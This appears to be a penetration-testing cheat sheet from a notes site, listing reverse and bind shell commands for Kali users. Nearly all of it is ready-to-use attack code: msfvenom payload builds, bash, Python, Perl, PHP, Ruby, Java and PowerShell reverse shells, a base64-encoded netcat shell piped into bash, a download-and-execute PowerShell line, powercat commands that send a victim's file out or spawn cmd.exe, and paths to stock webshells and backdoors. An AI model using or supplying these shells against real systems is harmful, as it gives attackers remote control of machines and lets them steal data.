Reverse shells

Collection of Revshells in different flavors | Kali $IP 10.10.10.10 | Target $IP 11.11.11.11

#msfvenom

#Windows .asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f asp > shell.asp

#Windows x64 Arch
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f asp > shell.asp

#JSP / Tomcat WAR 
msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f war > java4444.war  
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=4448 -f raw > w4448.jsp 


#php
msfvenom -p php/reverse_php LHOST=10.10.10.10 LPORT=1234 -f raw > shell.php


#binaries

Staged
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f elf > shell.elf 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f asp > shell.asp


Unstaged
msfvenom -p linux/x64/shell_reverse_tcp RHOST=11.11.11.11 LPORT=8080 -f elf > shell.elf
msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f asp > shell.asp

#Revshell piped in bash

1)Encode the payload in base64


echo 'nc -e /bin/bash 192.168.101.160 4444' | base64

bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMTAxLjE2MCA0NDQ0Cg==


2) Payload:

echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMTAxLjE2MCA0NDQ0Cg==| base64 -d | bash


3) Catch the revshell

nc -nvlp 4444

#bash

bash -i >& /dev/tcp/10.10.10.1/4444 0>&1  

mknod backpipe p && nc 10.10.10.1 4445 0<backpipe | /bin/bash 1>backpipe 

mkfifo /tmp/f2;cat /tmp/f2|/bin/sh -i |nc 10.10.10.1 4444 >/tmp/f2

#php

php -r '$sock=fsockopen("10.10.10.10",4446);exec("/bin/sh -i <&3 >&3 2>&3");'

#Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

#Perl

perl -e 'use Socket;$i="10.10.10.10";$p=4446;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

#ruby

ruby -rsocket -e'f=TCPSocket.open(10.10.10.10,80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

#java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.10/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

#Telnet

rm -f /tmp/p; mknod /tmp/p p && telnet 10.10.10.10 80 0/tmp/p

#Kali Webshells

Kali PHP reverse shells and command shells:
/usr/share/webshells/php/php-reverse-shell.php  #first love
/usr/share/webshells/php/php-findsock-shell.php
usr/share/webshells/php/findsock.c
/usr/share/webshells/php/simple-backdoor.php
/usr/share/webshells/php/php-backdoor.php

Kali Perl Reverse Shell
/usr/share/webshells/perl/perl-reverse-shell.pl
/usr/share/webshells/ perl/perlcmd.cgi

Kali Cold Fusion Shell
/usr/share/webshells/cfm/cfexec.cfm

Kali ASP Shell
/usr/share/webshells/asp/

Kali JSP Reverse Shell
/usr/share/webshells/jsp/jsp-reverse.jsp

#Powershell Reverse shell

Kali: nc -nvlp 443

Windows target:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out- String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Leng th);$stream.Flush();}$client.Close()"

#Powershell bind shell

Kali: nc -nv 10.11.0.22 443

Windows target , start a powershell listener:

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes =0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Leng th);$stream.Flush()};$client.Close();$listener.Stop()"

#Powercat

# install with: apt get powercat
#Default location:/usr/share/windows-resources/powercat
#Transfer powershell script to target or download with:

iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

#Powercat file transfer
Kali: nc -nvlp 443
Windows:powercat -c 10.10.10.10 -p 443 -i C:\Users\Redcliff\important.txt

#Powercat reverse shell
Kali: nc -nvlp 443
Windows:powercat -c 10.10.10.10 -p 443 -e cmd.exe

#Powercat bind shell
Kali : nc 11.11.11.11 443
Windows: powercat -l -p 443 -e cmd.exe

#Powercat standalone payload (Base64 encoded)
Windows: powercat -c 10.10.10.10 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1

Then: paste entire encoded string with -E flag
powershell.exe -E ZgB1AG4AYwB0AGkAbwBuACAAUwB0AHIAZQBhAG0AMQBfAFMAZQB0AHUAcAAKAHsACgAKACAAIAAgACAAcABhAH IAYQBtACgAJABGAHUAbgBjAFMAZQB0AHUAcABWAGEAcgBzACkACgAgACAAIAAgACQAYwAsACQAbAAsACQAcAAs ACQAdAAgAD0AIAAkAEYAdQBuAGMAUwBlAHQAdQBwAFYAYQByAHMACgAg........

Kali: nc -nvlp 443

PreviousData wrappersNextClient side attacks

Last updated